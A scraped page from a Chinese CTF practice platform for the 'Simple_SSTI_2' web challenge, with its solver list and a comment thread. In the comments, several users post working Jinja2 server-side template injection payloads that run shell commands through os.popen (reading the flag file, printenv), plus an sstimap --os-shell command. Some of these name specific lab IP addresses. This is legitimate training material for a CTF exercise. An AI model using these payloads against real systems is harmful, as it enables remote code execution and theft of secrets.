Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16411
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
dyh1213 攻破了该题 54分钟前
w111 攻破了该题 11小时前
00000000 攻破了该题 3天前
haoyun123 攻破了该题 5天前
DamonLee 攻破了该题 6天前
Newdap 攻破了该题 6天前
yxrqq817423 攻破了该题 7天前
xqy520 攻破了该题 8天前
Anna-july 攻破了该题 9天前
liqs 攻破了该题 12天前
落梅雨 攻破了该题 13天前
aaa想吃香菜 攻破了该题 14天前
听风说话 攻破了该题 15天前
linggin 攻破了该题 15天前
yyt030 攻破了该题 18天前
一只小白鲸 攻破了该题 21天前
Wu. 攻破了该题 24天前
tiger1cyd 攻破了该题 24天前
qq1002517 攻破了该题 25天前
评论
网恋秀牛子被录屏导致自卑 2月前
举报
/?flag={{(OvO.__eq__.__globals__.sys.modules.os.popen('cat flag')).read()}}
liutong27 6月前
举报
python3 sstimap.py -u http://117.72.52.127:12369/?flag=1 --os-shell
wywitkey 8月前
举报
前面说的都对,这道题在ssti里比较简单,推荐使用sstimap,可以一把梭,直接出os-shell
HK1ng 11月前
举报
详解:https://blog.csdn.net/m0_59527104/article/details/147013776
smtall 11月前
举报
flag={{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag').read() }}
hao7 1年前
举报
?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}
超爱西西鸭 1年前
举报
/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}
pettter 1年前
举报
?id={{config.__class__.__init__.__globals__['os'].popen('printenv').read()}}
不会写代码的菜鸟 1年前
举报
大佬们,为啥不能直接flag={{os.popen('cat ../app/flag').read()}}还需要加上那么多前缀
qingchuan 1年前
举报
因为没有import os,os是未定义的
q1152874733 1年前
举报
http://114.67.175.224:11052/?flag={{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag').read()")}}